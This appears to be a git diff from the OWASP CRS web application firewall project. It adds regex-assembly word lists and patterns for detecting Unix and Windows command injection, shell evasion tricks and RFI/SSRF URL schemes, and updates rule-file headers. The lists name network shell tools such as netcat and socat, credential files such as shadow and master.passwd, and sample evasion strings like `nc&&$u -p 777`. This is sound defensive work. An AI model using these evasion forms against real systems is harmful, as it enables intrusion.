+create\s+function\s*?\w+\s*?\(\s*?\)\s*?- +create\s+procedure\s*?\w+\s*?\(\s*?\)\s*?- +declare[^\w]+[@#]\s*?\w+ +div\s*?\([+-]*[\d.\s]+,[+-]*[\d.\s]+\) +exec\s*?\(\s*?@ +lo_import\s*?\( +lo_get\s*?\( +procedure\s+analyse\s*?\( +;\s*?declare\s+[\w-]+ +;\s*?open\s+[\w-]+ +::bigint +::bool +::double\s+precision +::int +::integer +::numeric +::oid +::real +::text +::smallint diff --git a/regex-assembly/include/unix-shell-4andup.ra b/regex-assembly/include/unix-shell-4andup.ra new file mode 100644 index 0000000000..6b82382792 --- /dev/null +++ b/regex-assembly/include/unix-shell-4andup.ra @@ -0,0 +1,576 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! This list was generated from the original lists with the following command: +##! awk '/^([a-z0-9_-]+)/ { x = $0; gsub(/[@~]/, "", x); if (length(x) > 3) print }' 93210{0,5}.data + +##! Note that the suffixes must be added manually to new entries. +##! To regenerate this list from unix-shell.data, run the following: +##! NL=$'\n' +##! original="$(grep -vE '^[#$]' regex-assembly/include/unix-shell-4andup.ra)" +##! source="$(awk '/^[^#$]/ {split($0,x,"/"); y=x[length(x)]} length(y) > 3 {print y}' \ +##! rules/unix-shell.data | \ +##! sort | uniq)" +##! result="" +##! # retain all unmodified entries in this list and skip removed ones; ignore the manually added suffixes +##! while read -r oword; do +##! # strip suffixes from end of words +##! oword_raw="${oword/%@/}" +##! oword_raw="${oword_raw/%~/}" +##! while read -r sword; do +##! # handle "clang++" +##! sword="${sword//++/\+\+}" +##! # handle "." in commands +##! sword="${sword//./\.}" +##! if [ "${oword_raw}" = "${sword}" ]; then +##! result="${result}${oword}${NL}" +##! break +##! fi +##! done <<<"${source}" +##! done <<<"${original}" + +##! # add new entries to this list +##! while read -r sword; do +##! # handle "clang++" +##! sword="${sword/%++/\+\+}" +##! # handle "." in commands +##! sword="${sword//./\.}" +##! found=0 +##! while read -r oword; do +##! # strip suffixes from end of words +##! oword_raw="${oword/%@/}" +##! oword_raw="${oword_raw/%~/}" +##! if [ "${oword_raw}" = "${sword}" ]; then +##! found=1 +##! break +##! fi +##! done <<<"${original}" +##! if [ ${found} -eq 0 ]; then +##! result="${result}${sword}${NL}" +##! fi +##! done <<<"${source}" + +##! # check entries for English words and suffix those +##! original="${result}" +##! english="$(util/fp-finder/spell.sh -m -e - <<<"${result}")" +##! result="" +##! while read -r oword; do +##! found=0 +##! while read -r eword; do +##! if [ "${oword}" = "${eword}" ] && [ -n "${oword}" ]; then +##! result="${result}${oword}@${NL}" +##! found=1 +##! break +##! fi +##! done <<<"${english}" +##! if [ ${found} -eq 0 ]; then +##! result="${result}${oword}${NL}" +##! fi +##! done <<<"${original}" + +##! body_start=$(grep -n -E -m 1 '^[^#$]' regex-assembly/include/unix-shell-4andup.ra | cut -d: -f1) +##! ed -s regex-assembly/include/unix-shell-4andup.ra <> regex-assembly/include/unix-shell-4andup.ra + +HEAD@ +POST@ +addgroup +adduser +agetty +alias@ +alpine@ +ansible-playbook +apt-get +aptitude@ +arch@ +aria2c +ascii-xfr +ascii85 +aspell +atobm +axel@ +base32 +base64 +basename@ +basenc +bash@ +batch@ +blkid +bpftrace +breaksw +bridge@ +bsdcat +bsdiff +bsdtar +builtin +bundler@ +bunzip2 +busctl +busybox +byebug +byobu +bzcat +bzcmp +bzdiff +bzegrep +bzexe +bzfgrep +bzgrep +bzip2 +bzip2recover +bzless +bzmore +cancel@ +capsh@ +certbot +chattr +chdir@ +check_by_ssh +check_cups +check_log +check_memory +check_raid +check_ssl_cert +check_statusfile +chflags +chgpasswd +chgrp +chmod +choom +chown +chpass +chroot@ +chsh +clang@ +clang\+\+ +cobc +column@ +comm@ +command@ +composer@ +compress@ +coproc +cowsay +cowthink +cpan +cpio +cpulimit +crash@ +cron +crontab +csplit +csvtool +cupsfilter +curl@ +dash@ +date@ +dhclient +dialog@ +diff@ +dmesg +dmidecode +dmsetup +doas +docker@ +done@ +dosbox +dpkg +dvips +e2fsck +easy_install +echo@ +efax +egrep +emacs +endif +endsw +env-update +esac +eval +exec@ +exiftool +expand@ +expect@ +export@ +expr +facter +fetch@ +fgrep +file@ +filetest +find@ +finger@ +fish@ +flock@ +fold@ +foreach +fping +ftpstats +ftpwho +function@ +gawk@ +gcore +genie@ +genisoimage +getfacl@ +ghci +gimp@ +ginsh +grep@ +group@ +groupmod +gtester +gunzip +gzcat +gzexe +gzip +hash@ +head@ +hexdump +highlight@ +history@ +hostid +hostname +hping3 +htdigest +htop +htpasswd +iconv +ifconfig +iftop +install@ +ionice +ip6tables +ipconfig +iptables +ispell +java@ +jexec +jobs@ +join@ +journalctl +jrunscript +kill@ +killall +knife@ +ksshell +last@ +lastcomm +lastlog +lastlogin +latex@ +ldconfig +less@ +lessecho +lessfile +lesspipe +lftp +lftpget +links@ +local@ +locate@ +loginctl +logname +logsave +look@ +losetup +ls-F +lsb_release +lscpu +lshw +lsmod +lsof +lspci +lsusb +ltrace +lualatex +luatex +lwp-download +lwp-dump +lwp-mirror +lwp-request +lynx@ +lz4c +lz4cat +lzcat +lzcmp +lzdiff +lzegrep +lzfgrep +lzgrep +lzless +lzma +lzmadec +lzmainfo +lzmore +mail@ +mailq +mailx@ +make@ +master\.passwd +mawk +mkdir@ +mkfifo +mknod +mktemp +mlocate +more@ +mosquitto +mount@ +msgattrib +msgcat +msgconv +msgfilter +msgmerge +msguniq +mutt@ +mysql +mysqladmin +mysqldump +mysqldumpslow +mysqlhotcopy +mysqlshow +nano@ +nasm +nawk +nc\.openbsd +nc\.traditional +ncat +neofetch +netcat +netkit-ftp +netplan +netstat +nice@ +nmap +node@ +nohup +nping +nroff +nsenter +nslookup +nstat +null@ +octave@ +onintr +openssl +openvpn +openvt +opkg +pacman@ +parted@ +passwd +paste@ +patch@ +pdflatex +pdftex +pdksh +perf@ +perl@ +perl5 +perlsh +perms@ +pftp +pgrep +php-cgi +php5 +php7 +pico@ +pidstat +pigz +ping@ +pkexec +pkg_info +pkginfo +pkill +popd +printenv +printf@ +psed +psftp +psql +ptar +ptardiff +ptargrep +puppet@ +pushd +pwd\.db +python2 +python3 +python~ +pyversions +py3versions +rake@ +raku +rbash +readelf +realpath +redcarpet@ +rename@ +repeat@ +replace@ +restic +rlogin +rlwrap +rmdir@ +rmuser +rnano +route@ +rpmdb +rpmquery +rpmverify +rsync +ruby~ +run-mailcap +run-parts +rview +rvim +sash@ +sched +screen@ +script@ +sdiff +self@ +sendmail +service@ +setarch +setenv +setfacl@ +setsid +sftp +sh\.distrib +shadow@ +shells@ +shuf +shutdown@ +sleep@ +slsh +smbclient +snap@ +socat +soelim +sort@ +source@ +split@ +spwd\.db +sqlite3 +ssh-keygen +ssh-keyscan +sshpass +start-stop-daemon +stdbuf +stderr +stdin +stdout +strace +strings@ +sudo +sysctl +systemctl +systemd-resolve +tail@ +tailf +task@ +taskset +tclsh +tcpdump +tcping +tcptraceroute +tcsh +telnet +tftp +time@ +timedatectl +timeout@ +tmux +touch@ +traceroute +traceroute6 +troff +tshark +ulimit@ +uname +uncompress@ +unexpand +uniq +unlink@ +unlz4 +unlzma +unpigz +unrar +unset@ +unshare@ +unxz +unzip@ +unzstd +up2date@ +update-alternatives +useradd +userdel +usermod +uudecode +uuencode +valgrind +view@ +vigr +vimdiff +vipw +virsh +volatility@ +wall@ +watch@ +wget +whiptail@ +whoami +whois +wireshark +wish@ +xargs +xelatex +xetex +xmodmap +xmore +xpad +xterm +xzcat +xzcmp +xzdec +xzdiff +xzegrep +xzfgrep +xzgrep +xzless +xzmore +yarn@ +yelp@ +zathura +zcat +zcmp +zdiff +zegrep +zero@ +zfgrep +zgrep +zipcloak +zipcmp +zipdetails +zipgrep +zipinfo +zipmerge +zipnote +zipsplit +ziptool +zless +zmore +zrun +zsoelim +zstd +zstdcat +zstdgrep +zstdless +zstdmt +zypper diff --git a/regex-assembly/include/unix-shell-evasion-prefix-start-of-string.ra b/regex-assembly/include/unix-shell-evasion-prefix-start-of-string.ra new file mode 100644 index 0000000000..dc951a296d --- /dev/null +++ b/regex-assembly/include/unix-shell-evasion-prefix-start-of-string.ra @@ -0,0 +1,6 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! ifconfig (start of string) +^ +##!> include unix-shell-evasion-prefix.ra diff --git a/regex-assembly/include/unix-shell-evasion-prefix.ra b/regex-assembly/include/unix-shell-evasion-prefix.ra new file mode 100644 index 0000000000..8965c80a66 --- /dev/null +++ b/regex-assembly/include/unix-shell-evasion-prefix.ra @@ -0,0 +1,98 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! This assembly file generates a prefix match for unix shell RCE +##! evasions. Command words, in this case, must folow the prefix. +##! Separate rules target commands that do not follow this prefix, +##! as the chance of false positives is higher without a prefix match. + +##! ifconfig +##!> cmdline unix + busybox + command + env + eval + ltrace + nohup + strace + time + timeout + watch +##!< +##! ;ifconfig +; +##! =ifconfig += +##! {ifconfig} +\{ +##! |ifconfig +\| +##! ||ifconfig +\|\| +##! &ifconfig +& +##! & &ifconfig +&& +##! ;\nifconfig +\n +##! ;\rifconfig +\r +##! $(ifconfig) +\$\( +##! $((ifconfig)) +\$\(\( +##! `ifconfig` +` +##! ${ifconfig} +\${ +##! <( ifconfig ) +<\( +##! >( ifconfig ) +>\( +##! a() ( ifconfig; ); a +\(\s*\) +##! `cat<< + +##! match possible white space between prefix expressions +\s* +##!=> + +##! commands prefix +##!> assemble + ##! { ifconfig } + \{ + ##! ( ifconfig ) + \s*\(\s* + ##! VARNAME=xyz ifconfig + \w+=(?:[^\s]*|\$.*|\$.*|<.*|>.*|\'.*\'|\".*\")\s+ + ##! ! ifconfig + !\s* + ##! $ifconfig + \$ +##!< +##!=> + +* +##!=> + +##! match possible white space between prefix expressions +\s* +##!=> + +##! quoting prefix +##!> assemble + ##! 'ifconfig' + ' + ##! "ifconfig" + \" +##!< +##!=> + +* +##!=> + +##! paths prefix (+ evasion prevention suffix [\x5c'\"]*) +(?:[\?\*\[\]\(\)\-\|+\w'\"\./\x5c]+/)?[\x5c'\"]* +##!=> diff --git a/regex-assembly/include/unix-shell-pl3.ra b/regex-assembly/include/unix-shell-pl3.ra new file mode 100644 index 0000000000..c17b751542 --- /dev/null +++ b/regex-assembly/include/unix-shell-pl3.ra @@ -0,0 +1,27 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! This list contains terms that are only searched for at PL 3. +##! Note that the equivalent could be achieved by using +##! `include` processors with both <= 3 and > 3 but that would +##! make the rule almost identical to its PL 1 counterparts, +##! artificially doubling the critiality of hits and adding +##! unnecessary overhead. + +##! Note that this list is arbitrary. We do not have criteria +##! for inclusion in this list apart from false positive +##! reports. + +##! This list must be in sync with: +##! - unix-shell-upto3.ra +##! - unix-shell-4andup.ra +##! - unix-shell-pl3.ra + +aptitude@ +dnf +pacman@ +ps +up2date@ +vi@ +who +w@ diff --git a/regex-assembly/include/unix-shell-upto3.ra b/regex-assembly/include/unix-shell-upto3.ra new file mode 100644 index 0000000000..874e5983f1 --- /dev/null +++ b/regex-assembly/include/unix-shell-upto3.ra @@ -0,0 +1,198 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! Note that the suffixes @ / ~ must be added manually to new entries. +##! To regenerate this list from unix-shell.data, run the following: +##! NL=$'\n' +##! # select words of length <= 3 +##! original="$(grep -vE '^[#$]' regex-assembly/include/unix-shell-upto3.ra)" +##! source=$(awk '/^[^#$]/ {split($0,x,"/"); y=x[length(x)]} length(y) <= 3 {print y}' \ +##! rules/unix-shell.data | \ +##! sort | uniq) +##! result="" +##! # retain all unmodified entries in this list and skip removed ones; ignore the manually added suffixes +##! while read -r oword; do +##! # strip @ and ~ from end of words +##! oword_raw="${oword/%@/}" +##! oword_raw="${oword_raw/%\~/}" +##! while read -r sword; do +##! if [ "${oword_raw}" = "${sword}" ]; then +##! result="${result}${oword}${NL}" +##! break +##! fi +##! done <<<"${source}" +##! done <<<"${original}" + +##! # add new entries to this list +##! while read -r sword; do +##! found=0 +##! while read -r oword; do +##! # strip @ and ~ from end of words +##! oword_raw="${oword/%@/}" +##! oword_raw="${oword_raw/%\~/}" +##! if [ "${oword_raw}" = "${sword}" ]; then +##! found=1 +##! break +##! fi +##! done <<<"${original}" +##! if [ ${found} -eq 0 ]; then +##! result="${result}${sword}${NL}" +##! fi +##! done <<<"${source}" + +##! # check entries for English words and suffix those +##! original="$(grep -vE '^[#$]' regex-assembly/include/unix-shell-upto3.ra)" +##! english="$(util/fp-finder/spell.sh -m -e regex-assembly/include/unix-shell-upto3.ra)" +##! # do not suffix the following words: +##! english="$(grep -vE 'ip|id|top|set' <<< "${english}")" +##! result="" +##! while read -r oword; do +##! found=0 +##! while read -r eword; do +##! if [ "${oword}" = "${eword}" ] && [ -n "${oword}" ]; then +##! result="${result}${oword}@${NL}" +##! found=1 +##! break +##! fi +##! done <<<"${english}" +##! if [ ${found} -eq 0 ]; then +##! result="${result}${oword}${NL}" +##! fi +##! done <<<"${original}" + +##! body_start=$(grep -n -E -m 1 '^[^#$]' regex-assembly/include/unix-shell-upto3.ra | cut -d: -f1) +##! ed -s regex-assembly/include/unix-shell-upto3.ra <> regex-assembly/include/unix-shell-upto3.ra + +7z +7za +7zr +7zx +GET@ +ab@ +apt@ +ar@ +arj +arp@ +as@ +ash@ +at@ +awk@ +aws@ +bzz@ +c89 +c99 +cat@ +cc@ +cmp +cp@ +csh +cut@ +dd@ +df +dig@ +dir@ +dnf +du@ +eb@ +ed@ +env@ +eqn +es@ +esh +ex@ +fc@ +fd +fg +fi@ +fmt +ftp@ +gcc~ +gdb +gem@ +ghc +git@ +go@ +gpg +grc +hd@ +hup@ +id +ip +irb +jjs +jq +ksh +ld@ +ldd@ +ln@ +lp@ +ls +lua@ +lz4 +lz@ +man@ +mtr +mv@ +nc@ +net@ +nl@ +nm@ +npm@ +od@ +pax@ +pdb +pf@ +pg +php@ +pic@ +pip~ +pkg +pr@ +pry@ +ps@ +ptx +pwd +pxz +rar@ +rc +rcp@ +red@ +rev@ +rm@ +rpm@ +scp +sed@ +set@ +sg@ +sh@ +ss@ +ssh@ +su@ +svn +tac +tar@ +tbl +tcp@ +tee@ +tex@ +tic@ +top +udp +ul@ +vi@ +vim@ +w3m +w@ +wc +who@ +xxd +xz@ +yes@ +yum +zip@ +zsh diff --git a/regex-assembly/include/url-schemes.ra b/regex-assembly/include/url-schemes.ra new file mode 100644 index 0000000000..136606e228 --- /dev/null +++ b/regex-assembly/include/url-schemes.ra @@ -0,0 +1,120 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! This is a list of schemes that can be used for RFI/SSRF (from https://en.wikipedia.org/wiki/List_of_URI_schemes): + +acap +afp +afs +attachment +beshare +bitcoin +blob +callto +cap +cid +cvs +dav +data +dict +dns +dntp +ed2k +expect +fd +feed +file +finger +fish +ftp +ftps +git +go +gopher +h323 +http +https +iax +icap +imap +imaps +ipp +ipps +irc +irc6 +ircs +jabber +jar +ldap +ldapi +ldaps +local_file +mailto +maven +mms +mumble +netdoc +news +nfs +nntp +nntps +ogg +paparazzi +phar +pop2 +pop3 +pop3s +pres +proxy +psyc +rmi +rsync +rtm +rtmfp +rtmp +s3 +sftp +sip +sips +smb +smtp +smtps +sms +snews +snmp +ssh +ssh2 +svn +svn\+ssh +teamspeak +telnet +tftp +turn +turns +udp +unreal +ut2004 +ventrilo +view-source +vnc +webcal +ws +wss +xmpp +xri + +##! Adding also the list of PHP (sub)schemes that can be used for RFI/SSRF (from https://www.php.net/manual/en/wrappers.php): + +ssh2.shell +ssh2.exec +ssh2.tunnel +ssh2.sftp +ssh2.scp +compress.zlib +compress.bzip2 +zip +glob +rar +ogg +expect +php diff --git a/regex-assembly/include/windows-commands-prefix.ra b/regex-assembly/include/windows-commands-prefix.ra new file mode 100644 index 0000000000..b59b4bb4ec --- /dev/null +++ b/regex-assembly/include/windows-commands-prefix.ra @@ -0,0 +1,68 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! This assembly file generates a prefix match for windows commands. +##! Command words, in this case, must follow the prefix. +##! Separate rules target commands that do not follow this prefix, +##! as the chance of false positives is higher without a prefix match. + +##! Note: the quoting prefixes are part of the command prefixes, except for ^ +##! which, for unknown reasons, is not part of the expression + +##! ;cmd +; +##! {cmd +\{ +##! |cmd +\| +##! ||cmd +\|\| +##! &cmd +& +##! &&cmd +&& +##! \ncmd +\n +##! \rcmd +\r +##! `cmd +` +##!=> + +##! match possible white space between prefix expressions +\s* +##!=> + +##! commands prefix +##!> assemble + ##! (cmd) + \( + ##! ,cmd + , + ##! @cmd + @ + ##! 'cmd' + ' + ##! "cmd" + \" + ##! spacing+cmd + \s +##!< +##!=> + +* +##!=> + +##! paths prefix +##!> assemble + ##! /path/cmd + [\w'\"\./]+/ + ##! C:\Program Files\cmd + [\x5c'\"\^]*\w[\x5c'\"\^]*:.*\x5c + ##! \\net\share\dir\cmd + [\^\.\w '\"/\x5c]*\x5c +##!< +##!=> + +?[\"\^]* +##!=> diff --git a/regex-assembly/include/windows-commands.ra b/regex-assembly/include/windows-commands.ra new file mode 100644 index 0000000000..5e36d81b92 --- /dev/null +++ b/regex-assembly/include/windows-commands.ra @@ -0,0 +1,299 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! Word list for rule 932380 (RCE Windows command injection part 2/2) +##! +##! The list comes from the Microsoft Windows Server documentation. +##! You can get it using the following one-liner: +##! `curl https://raw.githubusercontent.com/MicrosoftDocs/windowsserverdocs/main/WindowsServerDocs/administration/windows-commands/windows-commands.md | grep -oE '^-\s\[\w+\]' | cut -f2 -d[ | cut -f1 -d]` + +active +add +append +arp +assign +assoc +at +atmadm +attrib +attributes +auditpol +autochk +autoconv +autofmt +automount +bcdboot +bcdedit +bdehdcfg +bitsadmin +bootcfg +break +cacls +call +cd +certreq +certutil +change +chcp +chdir +chglogon +chgport +chgusr +chkdsk +chkntfs +choice +cipher +clean +cleanmgr +clip +cls +cmd +cmdkey +cmstp +color +comp +compact +convert +copy +create +cscript +date +dcdiag +dcgpofix +defrag +del +delete +detail +dfsdiag +dfsrmig +diantz +dir +diskcomp +diskcopy +diskpart +diskperf +diskraid +diskshadow +dispdiag +dnscmd +doskey +driverquery +echo +edit +endlocal +erase +eventcreate +Evntcmd +exec +exit +expand +expose +extend +extract +fc +filesystems +find +findstr +finger +flattemp +fondue +for +forfiles +format +freedisk +fsutil +ftp +ftype +fveupdate +getmac +gettype +goto +gpfixup +gpresult +gpt +gpupdate +graftabl +help +helpctr +hostname +icacls +if +inactive +ipconfig +ipxroute +irftp +jetpack +klist +ksetup +ktmutil +ktpass +label +list +lodctr +logman +logoff +lpq +lpr +macfile +makecab +mapadmin +md +mkdir +mklink +mmc +mode +more +mount +mountvol +move +mqbkup +mqsvc +mqtgsvc +msdt +msg +msiexec +msinfo32 +mstsc +nbtstat +netcfg +netdom +netsh +netstat +nfsadmin +nfsshare +nfsstat +nlbmgr +nltest +nslookup +ntbackup +ntcmdprompt +ntfrsutl +offline +online +openfiles +pagefileconfig +path +pathping +pause +pbadmin +pentnt +perfmon +ping +pktmon +pnpunattend +pnputil +popd +powershell +print +prncnfg +prndrvr +prnjobs +prnmngr +prnport +prnqctl +prompt +pubprn +pushd +pushprinterconnections +pwlauncher +pwsh +qappsrv +qprocess +query +quser +qwinsta +rd +rdpsign +recover +refsutil +reg +regini +regsvr32 +relog +rem +remove +ren +rename +repadmin +repair +replace +rescan +reset +retain +revert +rexec +risetup +rmdir +robocopy +rpcinfo +rpcping +rsh +rundll32 +rwinsta +san +schtasks +scwcmd +secedit +select +serverceipoptin +servermanagercmd +serverweroptin +setx +sfc +shadow +shift +showmount +shrink +shutdown +sort +start +subst +sxstrace +sysocmgr +systeminfo +takeown +tapicfg +taskkill +tasklist +tcmsetup +telnet +tftp +time +timeout +title +tlntadmn +tpmtool +tpmvscmgr +tracerpt +tracert +tree +tscon +tsdiscon +tsecimp +tskill +tsprof +type +typeperf +tzutil +unexpose +uniqueid +unlodctr +ver +verifier +verify +vol +vssadmin +waitfor +wbadmin +wdsutil +wecutil +wevtutil +where +whoami +winnt +winnt32 +winrs +wmic +writer +wscript +xcopy diff --git a/regex-assembly/toolchain.yaml b/regex-assembly/toolchain.yaml new file mode 100644 index 0000000000..d921b799b1 --- /dev/null +++ b/regex-assembly/toolchain.yaml @@ -0,0 +1,46 @@ +# # # # # # # # # # # # # # # # # # # # +# configuration file for crs-toolchain +# # # # # # # # # # # # # # # # # # # # +patterns: + # The Unix evasion patterns, were extended per decision in https://github.com/coreruleset/coreruleset/issues/2632. + anti_evasion: + # - [\x5c'\"\[)]: common evasion tokens and path expansion, e.g., `/bin/[c]''a""\t` + # - (?:\|\||&&)\s*: hiding of empty variables through logial operators, e.g., `nc&&$u -p 777` + # - \$[a-z0-9_@?!#{(*-]*: empty variable evasion, e.g., `n\$uc -p 777` + # - [\x5c'\"\[)], \$[a-z0-9_@?!#{(*-]*: arithmetic expansion evasion, e.g., `c$((9))9` + unix: | + [\x5c'\"\[)]*(?:(?:(?:\|\||&&)\s*)?\$[a-z0-9_@?!#{(*-]*)?\x5c? + windows: | + [\"\^]* + anti_evasion_suffix: + # - <>: redirection, e.g., `cat,&|)].* + # "more foo", "more,foo", "more;foo", "more.com", "more/e", + # "morefoo" + windows: | + [\s,;./<>].* + # Same as above but does not allow any white space as the next token. + # This is useful for words like `python3`, where `python@` would + # create too many false positives because it would match `python `. + anti_evasion_no_space_suffix: + # This will match: + # + # python<<,&|]|(?:[\w\d._-][\x5c'\"\[]*(?:(?:(?:\|\||&&)\s*)?\$[a-z0-9_@?!#{*-]*)?\x5c?)+[\s<>,&|]).* + # This will match: + # + # python,foo + # python2 foo + # + # It will _not_ match: + # python foo + windows: | + (?:[,;./<>]|(?:[\w\d._-][\"\^]*)+[\s,;./<>]).* diff --git a/rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf.example b/rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf.example index 8a23edafb0..620aca673b 100644 --- a/rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf.example +++ b/rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf.example @@ -1,8 +1,9 @@ # ------------------------------------------------------------------------ -# OWASP ModSecurity Core Rule Set ver.3.3.0 +# OWASP CRS ver.4.0.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. +# Copyright (c) 2021-2024 CRS project. All rights reserved. # -# The OWASP ModSecurity Core Rule Set is distributed under +# The OWASP CRS is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENSE file for full details. # ------------------------------------------------------------------------ @@ -81,9 +82,9 @@ # This ruleset allows you to control how ModSecurity will handle traffic # originating from Authorized Vulnerability Scanning (AVS) sources. See # related blog post - -# http://blog.spiderlabs.com/2010/12/advanced-topic-of-the-week-handling-authorized-scanning-traffic.html +# https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/updated-advanced-topic-of-the-week-handling-authorized-scanning-traffic/ # -# White-list ASV network block (no blocking or logging of AVS traffic) Update +# Allow List ASV network block (no blocking or logging of AVS traffic) Update # IP network block as appropriate for your AVS traffic # # ModSec Rule Exclusion: Disable Rule Engine for known ASV IP @@ -129,7 +130,7 @@ # Example Exclusion Rule: Removing a specific ARGS parameter from inspection # for all CRS rules # -# This rule illustrates that we can use tagging very effectively to whitelist a +# This rule illustrates that we can use tagging very effectively to allow list a # common false positive across an entire ModSecurity instance. This can be done # because every rule in OWASP_CRS is tagged with OWASP_CRS. This will NOT # affect custom rules. @@ -149,6 +150,10 @@ # This rule illustrates that we can remove a rule range via a ctl action. # This uses the fact, that rules are grouped by topic in rule files covering # a certain id range. +# IMPORTANT: ModSecurity v3, aka libModSecurity, does not currently support the +# use of rule ranges in a ruleRemoveById ctl action (this feature has been +# planned for v3.1). Consider using ruleRemoveByTag as a workaround, if +# appropriate. # # ModSecurity Rule Exclusion: Disable all SQLi and XSS rules # SecRule REQUEST_FILENAME "@beginsWith /admin" \ @@ -159,7 +164,37 @@ # ctl:ruleRemoveById=941000-942999" # # -# The application specific rule exclusion files -# REQUEST-903.9001-DRUPAL-EXCLUSION-RULES.conf -# REQUEST-903.9002-WORDPRESS-EXCLUSION-RULES.conf -# bring additional examples which can be useful then tuning a service. +# The application-specific rule exclusion plugins +# (see: https://github.com/coreruleset/plugin-registry) +# provide additional examples which can be useful then tuning a service. + + +# +# Example Rule: Allow monitoring tools and scripts +# +# Uncomment this rule to allow all requests from trusted IPs and User-Agent. +# This can be useful for monitoring tools like Monit, Nagios, or other agents. +# For example, if you're using AWS Load Balancer, you may need to trust all +# requests from "10.0.0.0/8" subnet that come with the user-agent +# "ELB-HealthChecker/2.0". By doing this, all requests that match these +# conditions will not be matched against the following rules: +# +# - id: 911100 (allowed methods) +# - id: 913100 (scan detection) +# - id: 920280 (missing/empty host header) +# - id: 920350 (IP address in host header) +# - tag: attack-disclosure (all RESPONSE-*-DATA-LEAKAGES rules) +# +# SecRule REMOTE_ADDR "@ipMatch 10.0.0.0/8" \ +# "id:1005,\ +# phase:1,\ +# pass,\ +# nolog,\ +# chain" +# SecRule REQUEST_METHOD "@pm GET HEAD" "chain" +# SecRule REQUEST_HEADERS:User-Agent "@pm ELB-HealthChecker" \ +# "ctl:ruleRemoveById=911100,\ +# ctl:ruleRemoveById=913100,\ +# ctl:ruleRemoveById=920280,\ +# ctl:ruleRemoveById=920350,\ +# ctl:ruleRemoveByTag=attack-disclosure" diff --git a/rules/REQUEST-901-INITIALIZATION.conf b/rules/REQUEST-901-INITIALIZATION.conf index 2a6f74e402..984252ec55 100644 --- a/rules/REQUEST-901-INITIALIZATION.conf +++ b/rules/REQUEST-901-INITIALIZATION.conf @@ -1,8 +1,9 @@ # ------------------------------------------------------------------------ -# OWASP ModSecurity Core Rule Set ver.3.3.0 +# OWASP CRS ver.4.0.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. +# Copyright (c) 2021-2024 CRS project. All rights reserved. # -# The OWASP ModSecurity Core Rule Set is distributed under +# The OWASP CRS is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENSE file for full details. # ------------------------------------------------------------------------ @@ -11,7 +12,7 @@ # This file REQUEST-901-INITIALIZATION.conf initializes the Core Rules # and performs preparatory actions. It also fixes errors and omissions # of variable definitions in the file crs-setup.conf. -# The setup.conf can and should be edited by the user, this file +# The crs-setup.conf can and should be edited by the user, this file # is part of the CRS installation and should not be altered. # @@ -23,9 +24,9 @@ # # - Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); OWASP_CRS/3.1.0. # -# Ref: https://github.com/SpiderLabs/ModSecurity/wiki/Reference-Manual#wiki-SecComponentSignature +# Ref: https://github.com/owasp-modsecurity/ModSecurity/wiki/Reference-Manual-(v2.x)#seccomponentsignature # -SecComponentSignature "OWASP_CRS/3.3.0" +SecComponentSignature "OWASP_CRS/4.0.0" # # -=[ Default setup values ]=- @@ -57,8 +58,8 @@ SecRule &TX:crs_setup_version "@eq 0" \ status:500,\ log,\ auditlog,\ - msg:'ModSecurity Core Rule Set is deployed without configuration! Please copy the crs-setup.conf.example template to crs-setup.conf, and include the crs-setup.conf file in your webserver configuration before including the CRS rules. See the INSTALL file in the CRS directory for detailed instructions',\ - ver:'OWASP_CRS/3.3.0',\ + msg:'ModSecurity CRS is deployed without configuration! Please copy the crs-setup.conf.example template to crs-setup.conf, and include the crs-setup.conf file in your webserver configuration before including the CRS rules. See the INSTALL file in the CRS directory for detailed instructions',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL'" @@ -66,62 +67,80 @@ SecRule &TX:crs_setup_version "@eq 0" \ # -=[ Default setup values ]=- # # Some constructs or individual rules will fail if certain parameters -# are not set in the setup.conf file. The following rules will catch +# are not set in the crs-setup.conf file. The following rules will catch # these cases and assign sane default values. # -# Default Inbound Anomaly Threshold Level (rule 900110 in setup.conf) +# Default Inbound Anomaly Threshold Level (rule 900110 in crs-setup.conf) SecRule &TX:inbound_anomaly_score_threshold "@eq 0" \ "id:901100,\ phase:1,\ pass,\ nolog,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ setvar:'tx.inbound_anomaly_score_threshold=5'" -# Default Outbound Anomaly Threshold Level (rule 900110 in setup.conf) +# Default Outbound Anomaly Threshold Level (rule 900110 in crs-setup.conf) SecRule &TX:outbound_anomaly_score_threshold "@eq 0" \ "id:901110,\ phase:1,\ pass,\ nolog,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ setvar:'tx.outbound_anomaly_score_threshold=4'" -# Default Paranoia Level (rule 900000 in setup.conf) -SecRule &TX:paranoia_level "@eq 0" \ +# Default Reporting Level (rule 900115 in crs-setup.conf) +SecRule &TX:reporting_level "@eq 0" \ + "id:901111,\ + phase:1,\ + pass,\ + nolog,\ + ver:'OWASP_CRS/4.0.0',\ + setvar:'tx.reporting_level=4'" + +# Default Early Blocking (rule 900120 in crs-setup.conf) +SecRule &TX:early_blocking "@eq 0" \ + "id:901115,\ + phase:1,\ + pass,\ + nolog,\ + ver:'OWASP_CRS/4.0.0',\ + setvar:'tx.early_blocking=0'" + +# Default Blocking Paranoia Level (rule 900000 in crs-setup.conf) +SecRule &TX:blocking_paranoia_level "@eq 0" \ "id:901120,\ phase:1,\ pass,\ nolog,\ - 